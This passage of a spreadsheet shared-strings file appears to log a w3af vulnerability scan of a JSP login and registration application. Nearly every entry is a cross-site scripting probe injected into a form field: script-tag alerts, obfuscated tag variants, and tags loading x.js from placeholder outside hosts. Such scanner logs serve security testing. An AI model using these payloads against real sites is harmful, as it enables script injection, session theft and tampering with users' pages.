    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=&lt;_x0000_script&gt;fake_alert("omg6")&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=&lt;script+src=http://omg6/x.js&gt;&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd='';!--"&lt;omg6&gt;=&amp;{()}&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=&lt;script/src=http://omg6/x.js&gt;&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=&lt;script/xss+src=http://omg6/x.js&gt;&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=&lt;script&gt;fake_alert(string.fromcharcode(omg6))&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=&lt;script&gt;a=/omg6/fake_alert(a.source)&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=&lt;script&gt;fake_alert("omg6")&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=ixklt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&lt;script&gt;fake_alert("v6j8")&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&lt;script&gt;a=/v6j8/fake_alert(a.source)&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&lt;script&gt;fake_alert(string.fromcharcode(v6j8))&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember='';!--"&lt;v6j8&gt;=&amp;{()}&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&lt;script/xss+src=http://v6j8/x.js&gt;&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&lt;_x0000_script&gt;fake_alert("v6j8")&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=yrubi&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;remember=&amp;pwd=frame30.&amp;modo=&lt;script&gt;fake_alert("tpup")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=8yrat&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script/xss+src=http://s1jo/x.js&gt;&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script&gt;fake_alert("s1jo")&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;_x0000_script&gt;fake_alert("s1jo")&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script+src=http://s1jo/x.js&gt;&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script/src=http://s1jo/x.js&gt;&lt;/script&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=m7fie&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;script&gt;fake_alert("jbu4")&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;script&gt;fake_alert(string.fromcharcode(jbu4))&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;script/xss+src=http://jbu4/x.js&gt;&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;_x0000_script&gt;fake_alert("jbu4")&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;script+src=http://jbu4/x.js&gt;&lt;/script&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=oz20q</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=&lt;script&gt;fake_alert("5cen")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo='';!--"&lt;5cen&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=&lt;script/xss+src=http://5cen/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=&lt;script&gt;fake_alert("piri")&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=&lt;script&gt;a=/piri/fake_alert(a.source)&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=j7fpl&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=udmgs&lt;s7k5&gt;s7k5"s7k5's7k5(s7k5)udmgs&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=&lt;script&gt;alert(string.fromcharcode(ej0x))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/src=http://ej0x/x.js&gt;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/xss+src=http://ej0x/x.js&gt;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+src=http://ej0x/x.js&gt;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&gt;a=/ej0x/alert(a.source)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scr_x0000_ipt&gt;alert("ej0x")&lt;/sc_x0000_ript&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=javas	cript:alert("ej0x");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&gt;alert("ej0x")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_x0000_script&gt;alert("ej0x")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&gt;fake_alert("oq08")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'';!--"&lt;oq08&gt;=&amp;{()}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/xss+src=http://oq08/x.js&gt;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/src=http://oq08/x.js&gt;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+src=http://oq08/x.js&gt;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_x0000_script&gt;fake_alert("oq08")&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=&lt;script&gt;fake_alert(string.fromcharcode(oq08))&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=khsd3&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script&gt;fake_alert(string.fromcharcode(qyaq))&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script&gt;a=/qyaq/fake_alert(a.source)&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script+src=http://qyaq/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni='';!--"&lt;qyaq&gt;=&amp;{()}&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script&gt;fake_alert("qyaq")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script/src=http://qyaq/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script/xss+src=http://qyaq/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=vn79e&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert(string.fromcharcode(oans))&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script/xss+src=http://oans/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;_x0000_script&gt;fake_alert("oans")&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script+src=http://oans/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert("oans")&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion='';!--"&lt;oans&gt;=&amp;{()}&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script/src=http://oans/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=tghgs&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert(string.fromcharcode(2jax))&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos='';!--"&lt;2jax&gt;=&amp;{()}&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script+src=http://2jax/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/xss+src=http://2jax/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert("2jax")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;a=/2jax/fake_alert(a.source)&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/src=http://2jax/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;_x0000_script&gt;fake_alert("2jax")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=ceoht&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;script&gt;a=/lhlq/fake_alert(a.source)&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;script/xss+src=http://lhlq/x.js&gt;&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;script+src=http://lhlq/x.js&gt;&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;script/src=http://lhlq/x.js&gt;&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;script&gt;fake_alert("lhlq")&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;script&gt;fake_alert(string.fromcharcode(lhlq))&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;_x0000_script&gt;fake_alert("lhlq")&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email='';!--"&lt;lhlq&gt;=&amp;{()}&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=x98xq&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script&gt;a=/bpqy/fake_alert(a.source)&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script&gt;fake_alert("bpqy")&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad='';!--"&lt;bpqy&gt;=&amp;{()}&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;_x0000_script&gt;fake_alert("bpqy")&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script/src=http://bpqy/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script/xss+src=http://bpqy/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script+src=http://bpqy/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=ra2z0&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre='';!--"&lt;2oup&gt;=&amp;{()}&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script+src=http://2oup/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert(string.fromcharcode(2oup))&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script/xss+src=http://2oup/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;a=/2oup/fake_alert(a.source)&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert("2oup")&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=ca5qa&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script&gt;fake_alert(string.fromcharcode(z1i1))&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script&gt;a=/z1i1/fake_alert(a.source)&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script&gt;fake_alert("z1i1")&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script+src=http://z1i1/x.js&gt;&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc='';!--"&lt;z1i1&gt;=&amp;{()}&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script/xss+src=http://z1i1/x.js&gt;&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script/src=http://z1i1/x.js&gt;&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=qfprj&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
